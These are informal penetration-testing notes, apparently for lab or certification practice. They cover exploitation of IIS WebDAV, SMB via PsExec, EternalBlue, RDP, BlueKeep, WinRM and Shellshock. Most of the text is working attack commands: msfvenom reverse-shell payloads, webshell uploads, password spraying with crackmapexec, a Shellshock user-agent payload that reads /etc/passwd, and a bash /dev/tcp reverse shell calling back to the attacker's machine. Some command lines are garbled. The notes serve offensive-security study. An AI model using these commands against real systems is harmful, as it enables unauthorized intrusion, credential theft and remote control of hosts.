- WINDOWS
-Microsoft IIS + WebDAV: (port 80/443)
Can execute .asp .aspx .config & .php files
davtest (used for scan, authenticate & exploit a WebDAV server)
davtest -url http://IPobj/webdav (without creds)
davtest -auth user:pass -url http://IPobj/webdav (this tells you the types of files we can upload and execute)
cadaver (upload files;download;screen display;edit;move;copy;create & erase collections;change the owener & block resources in WebDAV servers)
cadaver –help
cadaver http://IPobj/webdav (and input the credentials)
in other terminal: ls -al /usr/share/webshells (asp in this case)
after in cadaver: put /usr/share/webshells/asp/webshell.asp (config the shell if neccesary)
Come back again to the web page and try to execute the web shell typing the directory.
-Microsoft IIS + WebDAV METASPLOIT:
Method 1:
msfvenom -p /windows/meterpreter/reverse_tcp LHOST=IPkali LPORT=x -f asp > shell.asp (reverse shell payload in asp)
after: cadaver http://IPobj/webdav input credentials and upload the revshell with the put command
Open metasploit: service postgresql start && msfconsole -> use multi/handler -> set payload windows/meterpreter/reverse_tcp (config exactly as the payload that we created with msfvenom), run it go to the web page, execute the payload uploaded and we got a reverse shell.
Method 2:
search iis upload -> use 1 -> show options & config it -> set path /webdav/metasploit.asp -> exploit
-EXPLOITING SMB WITH PSEXEC:
To use PsExec we need credentials (user & pass) or a hash if we haven't the pass.
use: psexec.py user@IPobj cmd.exe
Para meterpreter:
search psexec -> use 10 (exploit/windows/smb/psexec) -> configurate and run.
-ETERNALBLUE (Metasploit or python script from searchsploit). MS17-010 & CVE-2017-0144
Eternalblue is easy bruh.
-EXPLOITING RDP: (normally 3389 TCP)
Requires an account of the victim PC (username & password)
metasploit rdp_scanner (to see the version of RDP)
then bruteforce (with hydra for example) if we get an account with privileges is better.
xfreerdp /u:user /p:password /v:IPobj:RDPport (to connect via RDP to the victim machine)
-BLUEKEEP: CVE-2019-0708:
METASPLOIT: search bluekeep (use the auxiliar module to see if it's vulnerable)
then search bluekeep -> use 1 (only works for x64 bits targets) -> show options (config as needed) -> show targets (choose the right one)
-EXPLOITING WinRM: (5985 TCP y 5986 HTTPS)
Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Remote administration protocol for Windows hosts.
Exploitation:
crackmapexec to see the help panel
crackmapexec WinRM IPobj -u administrator -p /wordlistpass (to get credentials of a privileged user, Administrator always exists on windows)
crackmapexec winrm IPobj -u administrator -p pass -x “whoami” (to try RCE)
evil-winrm(.rb) -u administrator -p ‘passadmin’ -i IPobj (to obtain a shell of the victim)
METASPLOIT:
search winr_script_exec -> use 0 -> show options (y configurar) -> set force_vbs true -> set username y password -> exploit (it may not work, try a few times)
- LINUX:
-SHELLSHOCK: (CVE-2014-6271)
The shellshock vulenrability happens because a vulnerability in bash (old versions), bash executes commands after this instruction: (){:;};
Apache webservers configured to run cgi scripts or sh scripts may be vulnerable to this (those scripts are in /cgi-bin/ directory)
To exploit this vulnerability you have to find a script that is running through bash.
In the context of an apache webserver we could use any .cgi script stored in there.
EXPLOITING SHELLSHOCK:
We connect to the web page through the web explorer.
In the source code we see this:
In <script> we see that executes a .cgi file, access to the script through the URL.
Check if it's vulnerable con: nmap -sV IPobj –script=http-shellshock –script-args “http-shellshock.uri=/script.cgi”
MANUAL EXPLOITATION:
With burpsuite intercept the page IPobj/script.cgi -> right click -> send to repeater -> change the user-agent for: (){:;}; echo; echo; /bin/bash -c ‘cat /etc/passwd’ -> send , in response we get the output of the command executed. THIS IS A RCE SO YOU CAN USE /usr/bin/whoami for example.
MANUAL REVERSE SHELL:
nc -nlvp port (on local machine)
Go back to burpsuite repeater and in user-agent put this: (){:;}; echo; echo; /bin/bash -c ‘bash -i&/dev/tcp/IPkali/LPORTnetcat 0>&1’and we obtain the reverse shell.
METASPLOIT:
search shellshock -> use 5 (exploit/multi/http/apache_mod_cgi_bash_env_exec) -> show options -> set targeturi script.cgi -> exploit